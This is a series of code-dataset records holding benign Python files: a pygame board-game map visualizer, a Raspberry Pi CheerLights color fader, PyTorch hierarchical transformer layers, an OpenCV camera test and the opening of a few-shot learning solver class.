width*game_map.nodes[start].pixel[0] + margin*(game_map.nodes[start].pixel[0]+1) + width/2\r\n start_y = height*game_map.nodes[start].pixel[1] + margin*(game_map.nodes[start].pixel[1]+1) + height/2\r\n end_x = width*game_map.nodes[end].pixel[0] + margin*(game_map.nodes[end].pixel[0]+1) + width/2\r\n end_y = height*game_map.nodes[end].pixel[1] + + margin*(game_map.nodes[end].pixel[1]+1) + height/2\r\n print(current_road)\r\n return [(start_x,start_y),(end_x,end_y)]\r\n\r\n return\r\n\r\n\r\n\r\ncities = get_cities()\r\ncurrent_road = []\r\nadded_lines = []\r\n# -------- Main Program Loop -----------\r\nwhile not done:\r\n screen.fill(white)\r\n# --- Main event loop\r\n for event in pygame.event.get(): # User did something\r\n pos = pygame.mouse.get_pos()\r\n if event.type == pygame.QUIT: # If user clicked close\r\n done = True # Flag that we are done so we exit this loop\r\n\r\n\r\n if event.type == pygame.MOUSEBUTTONUP and check_mouse(pos):\r\n if len(current_road) == 1:\r\n current_road.append(check_mouse(pos))\r\n added_lines.append(use_road(current_road))\r\n current_road = []\r\n elif len(current_road) == 0:\r\n \r\n current_road.append(check_mouse(pos))\r\n\r\n \r\n\r\n \r\n draw_roads(added_lines)\r\n better_map()\r\n check_mouse(pos)\r\n \r\n\r\n\r\n\r\n\r\n fontObj = pygame.font.Font('freesansbold.ttf', 19)\r\n textSurfaceObj = fontObj.render(\"Mouse Pos: \" + str(pos), True, white, black)\r\n textRectObj = textSurfaceObj.get_rect()\r\n textRectObj.topleft = (1360,6)\r\n screen.blit(textSurfaceObj, textRectObj)\r\n\r\n fontObj = pygame.font.Font('freesansbold.ttf', 14)\r\n textSurfaceObj = fontObj.render(\"Current Road: \" + str(current_road), True, white, black)\r\n textRectObj = textSurfaceObj.get_rect()\r\n textRectObj.topleft = (1360,6+19*1)\r\n screen.blit(textSurfaceObj, textRectObj)\r\n\r\n\r\n # --- Go ahead and update the screen with what we've drawn.\r\n pygame.display.update()\r\n\r\n # --- Limit to 60 frames per second\r\n clock.tick(60)\r\n\r\n# Close the window and quit.\r\n# If you forget this line, the program will 'hang'\r\n# on exit if running from IDLE.\r\npygame.quit()\r\n\r\n", "sub_path": "TTR/viz.py", "file_name": "viz.py", "file_ext": "py", "file_size_in_byte": 5778, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "ttr_classes.Map", "line_number": 5, "usage_type": "call"}, {"api_name": "ttr_info.city_map", "line_number": 5, "usage_type": "attribute"}, {"api_name": "ttr_info.possible_tickets", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 26, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.draw.lines", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.draw.lines", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 70, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 70, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 87, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 88, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 88, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 120, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 121, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 121, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 122, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONUP", "line_number": 126, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 146, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 146, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 152, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 160, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 160, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 168, "usage_type": "call"}]} +{"seq_id": "58053991", "text": "# This is a Python 3 script which allows you to run CheerLights on Raspberry Pi using GPIO.\n# Copyright (c) 132ikl 2017\nimport time\nimport requests\nimport re\nrgb = [200,13,67]\nstart = [rgb[0],rgb[1],rgb[2]]\nfinish = [255,255,255]\ncheerColor = \"FF4500\"\noldColor = \"FF0000\"\n\n# From StackExchange user Jeremy Cantrell. Thanks! Link: https://goo.gl/HGZGYh\ndef hex_to_rgb(value):\n value = value.lstrip('#')\n lv = len(value)\n return tuple(int(value[i:i + lv // 3], 16) for i in range(0, lv, lv // 3))\n\ndef rgb_to_hex(red, green, blue):\n return '%02x%02x%02x' % (red, green, blue)\n\ndef fade(t1, t2, sleep=20, steps=200):\n\tfor x in range(steps):\n\t\trStep = (float(t2[0])-float(t1[0]))/steps\n\t\tgStep = (float(t2[1])-float(t1[1]))/steps\n\t\tbStep = (float(t2[2])-float(t1[2]))/steps\n\t\trgb[0] += rStep\n\t\trgb[1] += gStep\n\t\trgb[2] += bStep\n\t\tprint(int(rgb[2]))\n\t\ttime.sleep(sleep / 1000.0)\n\nwhile True:\n\ttry:\n\t\tresponse = requests.get(\"http://api.thingspeak.com/channels/1417/field/2/last.txt\")\n\t\toldColor = cheerColor\n\t\tcheerColor = re.search(\"b\\'#(\\w+)\",str(response.content))\n\t\tcheerColor = cheerColor.group(1)\n\texcept:\n\t\tprint(\"An error occured! There is likely no internet connection. Trying again in 5 seconds...\")\n\tif oldColor != cheerColor:\n\t\tcheerRGB = hex_to_rgb(cheerColor)\n\t\tstart = [rgb[0],rgb[1],rgb[2]]\n\t\tfinish = [cheerRGB[0],cheerRGB[1],cheerRGB[2]]\n\t\tfade(start,finish)\n\telse:\n\t\tprint(\"Color is same as old color. Checking again in 5 seconds...\")\n\ttime.sleep(5)", "sub_path": "RaspberryLights.py", "file_name": "RaspberryLights.py", "file_ext": "py", "file_size_in_byte": 1475, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "time.sleep", "line_number": 30, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}, {"api_name": "re.search", "line_number": 36, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 47, "usage_type": "call"}]} +{"seq_id": "78358962", "text": "import numpy as np\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.autograd import Variable\r\nfrom torch.nn import functional as F\r\nfrom rezero.transformer import RZTXEncoderLayer\r\nfrom models_h_transformer.modules import PositionalEncoding\r\n\r\n\r\nclass DMLC(nn.Module):\r\n def __init__(self, w2v_weight, vocab_size, embedding_dim, hidden_dim, batch_size, num_labels):\r\n super(DMLC, self).__init__()\r\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n self.emd = EmbeddingLayer(w2v_weight, vocab_size, embedding_dim, hidden_dim, batch_size)\r\n self.sl = SentenceLayer(embedding_dim, hidden_dim, batch_size, num_labels)\r\n self.dl = DecisionLayer(hidden_dim, num_labels)\r\n\r\n def init_hidden_state(self, batch_size=None):\r\n # self.emd.init_hidden_state(batch_size)\r\n self.sl.init_hidden_state(batch_size)\r\n\r\n def forward(self, input, w_mask, s_mask):\r\n output_list = []\r\n w1 = []\r\n input = input.permute(1, 0, 2)\r\n w_mask = w_mask.permute(1, 0, 2)\r\n for i, m in zip(input, w_mask):\r\n output, w = self.emd(i.permute(1, 0), m)\r\n output_list.append(output)\r\n w1.append(w)\r\n output = torch.cat(output_list, 0)\r\n output, w2 = self.sl(output, s_mask)\r\n output, w3 = self.dl(output)\r\n return output, [w1, w2, w3]\r\n\r\n\r\nclass EmbeddingLayer(nn.Module):\r\n def __init__(self, w2v_weight, vocab_size, embedding_dim, hidden_dim, batch_size, num_heads=2, head_dim=25):\r\n super(EmbeddingLayer, self).__init__()\r\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n self.vocab_size = vocab_size\r\n self.embedding_dim = embedding_dim\r\n self.hidden_dim = hidden_dim\r\n self.batch_size = batch_size\r\n self.num_heads = num_heads\r\n self.head_dim = head_dim\r\n self.pos = False\r\n self.embedding = nn.Embedding(vocab_size, embedding_dim).from_pretrained(\r\n torch.from_numpy(w2v_weight), padding_idx=0)\r\n self.embedding.weight.requires_grad = False\r\n # self.embedding = nn.Embedding(vocab_size, embedding_dim, padding_idx=0)\r\n # nn.init.xavier_normal_(self.embedding.weight)\r\n\r\n if self.pos:\r\n self.pe = PositionalEncoding(d_model=embedding_dim)\r\n\r\n encoder_layer = nn.TransformerEncoderLayer(embedding_dim, 4, 256, 0.1, activation='gelu')\r\n # encoder_layer = RZTXEncoderLayer(d_model=embedding_dim, nhead=4, dim_feedforward=256, dropout=0.1,\r\n # activation='gelu')\r\n self.transformer_encoder = nn.TransformerEncoder(encoder_layer, 2)\r\n\r\n self.trans = nn.Linear(embedding_dim, head_dim * num_heads, bias=True)\r\n nn.init.xavier_normal_(self.trans.weight)\r\n self.query = nn.Parameter(torch.empty(head_dim * num_heads, 1))\r\n nn.init.xavier_normal_(self.query)\r\n self.linear = nn.Linear(head_dim * num_heads, hidden_dim, bias=True)\r\n nn.init.xavier_normal_(self.linear.weight)\r\n\r\n # self.trans = nn.ModuleList()\r\n # self.contents = nn.ModuleList()\r\n # d = [50, 50, 50, 50]\r\n # # self.scale = np.sqrt(50)\r\n # self.scaled = d\r\n # for i in range(len(d)):\r\n # l = nn.Linear(embedding_dim, d[i], bias=True)\r\n # nn.init.xavier_normal_(l.weight)\r\n # c = nn.Linear(d[i], 1, bias=False)\r\n # nn.init.xavier_normal_(c.weight)\r\n # self.trans.append(l)\r\n # self.contents.append(c)\r\n # self.linear = nn.Linear(sum(d), embedding_dim, bias=True)\r\n # nn.init.xavier_normal_(self.linear.weight)\r\n\r\n self.drop = nn.Dropout(0.1)\r\n self.drop1 = nn.Dropout(0.1)\r\n self.tanh = nn.Tanh()\r\n\r\n def forward(self, sequence, mask):\r\n sequence_embedding = self.embedding(sequence)\r\n if self.pos:\r\n sequence_embedding = self.pe(sequence_embedding)\r\n else:\r\n sequence_embedding = self.drop(sequence_embedding)\r\n f_output = self.transformer_encoder(sequence_embedding, src_key_padding_mask=mask)\r\n\r\n output = self.trans(f_output)\r\n # check contiguous and make batch first\r\n output = output.contiguous().view(output.size()[0], output.size()[1],\r\n self.num_heads, self.head_dim).permute(1, 2, 0, 3)\r\n query = self.query.contiguous().view(self.num_heads, self.head_dim).unsqueeze(0).permute(1, 2, 0)\r\n score = torch.matmul(output, query)\r\n mask = mask.unsqueeze(1).unsqueeze(3).expand(-1, self.num_heads, -1, -1)\r\n weight = F.softmax(score.masked_fill(mask, float('-inf')), dim=2)\r\n output = torch.matmul(output.transpose(2, 3), weight).squeeze(-1)\r\n output = output.contiguous().view(1, output.size()[0], -1)\r\n output = self.linear(output)\r\n output = self.drop1(output)\r\n\r\n # weight = []\r\n # o = []\r\n # for i in range(len(self.scaled)):\r\n # output = self.trans[i](f_output)\r\n # # output = self.drop(output)\r\n # score = self.contents[i](output).squeeze(2).permute(1, 0)\r\n # w = F.softmax(score.masked_fill(mask, float('-inf')), dim=1)\r\n # # w = self.drop(w)\r\n # output = torch.bmm(output.permute(1, 0, 2).transpose(1, 2),\r\n # w.unsqueeze(2)).squeeze(2).unsqueeze(0)\r\n # weight.append(w.unsqueeze(1))\r\n # o.append(output)\r\n # # print(torch.max(score))\r\n # output = torch.cat(o, dim=-1)\r\n # output = self.linear(output)\r\n # output = self.drop1(output)\r\n\r\n return output, weight\r\n\r\n\r\nclass SentenceLayer(nn.Module):\r\n def __init__(self, input_dim, hidden_dim, batch_size, num_labels, num_heads=2, head_dim=25):\r\n super(SentenceLayer, self).__init__()\r\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n self.input_dim = input_dim\r\n self.hidden_dim = hidden_dim\r\n self.batch_size = batch_size\r\n self.num_labels = num_labels\r\n self.num_heads = num_heads\r\n self.head_dim = head_dim\r\n self.pos = False\r\n\r\n if self.pos:\r\n self.pe = PositionalEncoding(d_model=input_dim)\r\n\r\n encoder_layer = nn.TransformerEncoderLayer(input_dim, 4, 512, 0.1, activation='gelu')\r\n # encoder_layer = RZTXEncoderLayer(d_model=input_dim, nhead=4, dim_feedforward=512, dropout=0.1,\r\n # activation='gelu')\r\n self.transformer_encoder = nn.TransformerEncoder(encoder_layer, 1)\r\n\r\n self.trans = nn.Linear(hidden_dim, head_dim * num_heads, bias=True)\r\n nn.init.xavier_normal_(self.trans.weight)\r\n self.query = nn.Parameter(torch.empty(head_dim * num_heads, 1))\r\n nn.init.xavier_normal_(self.query)\r\n self.linear = nn.Linear(head_dim * num_heads, hidden_dim, bias=True)\r\n nn.init.xavier_normal_(self.linear.weight)\r\n self.lb = nn.Linear(hidden_dim, hidden_dim * num_labels, bias=True)\r\n nn.init.xavier_normal_(self.lb.weight)\r\n\r\n # self.trans = nn.ModuleList()\r\n # self.contents = nn.ModuleList()\r\n # d = [50, 50, 50, 50]\r\n # self.scaled = d\r\n # for i in range(len(d)):\r\n # l = nn.Linear(hidden_dim, d[i], bias=True)\r\n # nn.init.xavier_normal_(l.weight)\r\n # c = nn.Linear(d[i], 1, bias=False)\r\n # nn.init.xavier_normal_(c.weight)\r\n # self.trans.append(l)\r\n # self.contents.append(c)\r\n # self.linear = nn.Linear(sum(d), hidden_dim, bias=True)\r\n # nn.init.xavier_normal_(self.linear.weight)\r\n # self.label = nn.ModuleList()\r\n # for i in range(num_labels):\r\n # lb = nn.Linear(hidden_dim, hidden_dim, bias=True)\r\n # nn.init.xavier_normal_(lb.weight)\r\n # self.label.append(lb)\r\n\r\n self.drop = nn.Dropout(0.1)\r\n self.drop1 = nn.Dropout(0.1)\r\n self.drop2 = nn.Dropout(0.1)\r\n self.tanh = nn.Tanh()\r\n\r\n def forward(self, input, mask):\r\n if self.pos:\r\n input = self.pe(input)\r\n f_output = self.transformer_encoder(input, src_key_padding_mask=mask)\r\n\r\n output = self.trans(f_output)\r\n # check contiguous and make batch first\r\n output = output.contiguous().view(output.size()[0], output.size()[1],\r\n self.num_heads, self.head_dim).permute(1, 2, 0, 3)\r\n query = self.query.contiguous().view(self.num_heads, self.head_dim).unsqueeze(0).permute(1, 2, 0)\r\n score = torch.matmul(output, query)\r\n mask = mask.unsqueeze(1).unsqueeze(3).expand(-1, self.num_heads, -1, -1)\r\n weight = F.softmax(score.masked_fill(mask, float('-inf')), dim=2)\r\n output = torch.matmul(output.transpose(2, 3), weight).squeeze(-1)\r\n\r\n output = output.contiguous().view(1, output.size()[0], -1)\r\n output = self.linear(output)\r\n output = self.drop(output)\r\n output = self.lb(output)\r\n output = self.drop2(output)\r\n output = output.contiguous().view(1, output.size()[1], self.num_labels, self.hidden_dim).squeeze(0).transpose(0, 1)\r\n\r\n # weight = []\r\n # o = []\r\n # for i in range(len(self.scaled)):\r\n # output = self.trans[i](f_output)\r\n # # output = self.drop(output)\r\n # score = self.contents[i](output).squeeze(2).permute(1, 0)\r\n # w = F.softmax(score.masked_fill(mask, float('-inf')), dim=1)\r\n # # w = self.drop1(w)\r\n # output = torch.bmm(output.permute(1, 0, 2).transpose(1, 2),\r\n # w.unsqueeze(2)).squeeze(2).unsqueeze(0)\r\n # weight.append(w.unsqueeze(1))\r\n # o.append(output)\r\n # output = torch.cat(o, dim=-1)\r\n # output = self.linear(output)\r\n # output = self.drop(output)\r\n # labels = []\r\n # for i in range(self.num_labels):\r\n # l_out = self.label[i](output)\r\n # # l_out = F.gelu(l_out)\r\n # l_out = self.drop2(l_out)\r\n # labels.append(l_out)\r\n # output = torch.cat(labels, dim=0)\r\n\r\n return output, weight\r\n\r\n\r\nclass DecisionLayer(nn.Module):\r\n def __init__(self, input_dim, num_class=33, hidden_dim=100, n_head=4, dropout=0.1):\r\n super(DecisionLayer, self).__init__()\r\n\r\n encoder_layer = nn.TransformerEncoderLayer(input_dim, 4, 512, 0.1, activation='gelu')\r\n # encoder_layer = RZTXEncoderLayer(d_model=input_dim, nhead=4, dim_feedforward=512, dropout=0.1,\r\n # activation='gelu')\r\n self.transformer_encoder = nn.TransformerEncoder(encoder_layer, 1)\r\n\r\n # self.out = nn.Linear(input_dim, 1)\r\n # nn.init.xavier_normal_(self.out.weight)\r\n\r\n self.topic_embedding = nn.Parameter(torch.empty(num_class, input_dim))\r\n self.mlp_1 = nn.Linear(num_class, hidden_dim)\r\n self.mlp_2 = nn.Linear(hidden_dim, 1)\r\n nn.init.xavier_normal_(self.topic_embedding)\r\n nn.init.xavier_normal_(self.mlp_1.weight)\r\n nn.init.xavier_normal_(self.mlp_2.weight)\r\n # self.ln = nn.LayerNorm(num_class)\r\n # self.scale = num_class ** -0.5\r\n\r\n def forward(self, input):\r\n # output = input\r\n output = self.transformer_encoder(input)\r\n attn_output_weights=None\r\n #o, attn_output_weights = self.transformer_encoder.layers[0].self_attn(input, input, input)\r\n\r\n # interaction = torch.matmul(self.topic_embedding, output.permute(1, 2, 0))\r\n interaction = torch.matmul(output.permute(1, 0, 2), self.topic_embedding.transpose(1, 0))\r\n # interaction = self.ln(interaction)\r\n output = F.gelu(self.mlp_1(interaction))\r\n output = self.mlp_2(output).squeeze(-1)\r\n\r\n # output = self.out(output).squeeze(2).transpose(0, 1)\r\n\r\n return output, attn_output_weights\r\n", "sub_path": "models_h_transformer/layers.py", "file_name": "layers.py", "file_ext": "py", "file_size_in_byte": 12031, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.nn.Embedding", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 49, "usage_type": "call"}, {"api_name": "models_h_transformer.modules.PositionalEncoding", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.nn.TransformerEncoderLayer", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoder", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 63, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.empty", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 65, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 67, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 84, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 85, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 86, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 129, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 129, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 132, "usage_type": "attribute"}, {"api_name": "models_h_transformer.modules.PositionalEncoding", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.nn.TransformerEncoderLayer", "line_number": 144, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 144, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoder", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 147, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 149, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 149, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 150, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 150, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 151, "usage_type": "name"}, {"api_name": "torch.empty", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 152, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 152, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 153, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 153, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 154, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 154, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 154, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 155, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 156, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 177, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 177, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 178, "usage_type": "name"}, {"api_name": "torch.nn.Dropout", "line_number": 179, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 179, "usage_type": "name"}, {"api_name": "torch.nn.Tanh", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 180, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 194, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 195, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 230, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 230, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoderLayer", "line_number": 234, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 234, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoder", "line_number": 237, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 237, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 242, "usage_type": "name"}, {"api_name": "torch.empty", "line_number": 242, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 243, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 243, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 244, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 245, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 245, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 246, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 246, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal_", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 247, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 247, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 258, "usage_type": "call"}, {"api_name": "torch.nn.functional.gelu", "line_number": 260, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 260, "usage_type": "name"}]} +{"seq_id": "77891065", "text": "import numpy as np\nimport cv2\nimport os\n\ndef main():\n camera = cv2.VideoCapture(0)\n ## get camera\n\n camera.set(cv2.CAP_PROP_FRAME_WIDTH, 480)\n camera.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n ## set width & height\n\n\n if camera.isOpened() == False: ##checks for camera\n print (\"no camera\") ##if false, exits\n return\n\n while (cv2.waitKey(1) != 27) and (camera.isOpened()): ##exits if user press esc or camera is closed/disconnected\n nextframe, originalframe = camera.read()\n ## get next frame\n\n if not nextframe or originalframe is None:\n break\n #ends if no new frames\n\n cv2.namedWindow(\"capture\", cv2.WINDOW_AUTOSIZE)\n cv2.imshow(\"capture\", originalframe)\n\n cv2.destroyAllWindows()\n return\n ## end capture\n\nif __name__ == \"__main__\":\n main()\n## dec.24.2016 ##tested on my mac; it works\n##step 2: detect moving object in the image then mark it.\n##step 3: track moving object.\n", "sub_path": "Pedestrian Tracking Rover/camera test.py", "file_name": "camera test.py", "file_ext": "py", "file_size_in_byte": 987, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cv2.VideoCapture", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 9, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 10, "usage_type": "attribute"}, {"api_name": "cv2.waitKey", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.WINDOW_AUTOSIZE", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 29, "usage_type": "call"}]} +{"seq_id": "637264989", "text": "import os\nimport numpy as np\nimport torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.utils as vutils\nfrom torch.optim.lr_scheduler import StepLR\nfrom model import Convnet, MLP, Hallucinator, Discriminator\nfrom utils import pairwise_distances\n\n\nclass Solver(object):\n def __init__(self, config, train_loader, val_loader):\n self.use_cuda = torch.cuda.is_available()\n self.device = torch.device('cuda' if self.use_cuda else 'cpu')\n self.train_loader = train_loader\n self.val_loader = val_loader\n self.episodes_per_epoch = config.episodes_per_epoch\n self.N_way_train = config.N_way_train\n self.N_shot_train = config.N_shot_train\n self.N_query_train = config.N_query_train\n self.M_aug_train = config.M_aug_train\n self.N_way_val = config.N_way_val\n self.N_shot_val = config.N_shot_val\n self.N_query_val = config.N_query_val\n self.M_aug_val = config.M_aug_val\n self.matching_fn = config.matching_fn\n self.nz = config.nz\n\n self.num_epochs = config.num_epochs\n self.resume_iter = config.resume_iter\n self.num_d_steps = config.num_d_steps\n self.lr = config.lr\n self.num_steps_decay = config.num_steps_decay\n self.beta1 = config.beta1\n self.beta2 = config.beta2\n self.weight_decay = config.weight_decay\n self.active_adversarial_loss_step = config.active_adversarial_loss_step\n self.alpha_weight = config.alpha_weight\n self.exp_name = config.name\n os.makedirs(config.ckp_dir, exist_ok=True)\n self.ckp_dir = os.path.join(config.ckp_dir, self.exp_name)\n 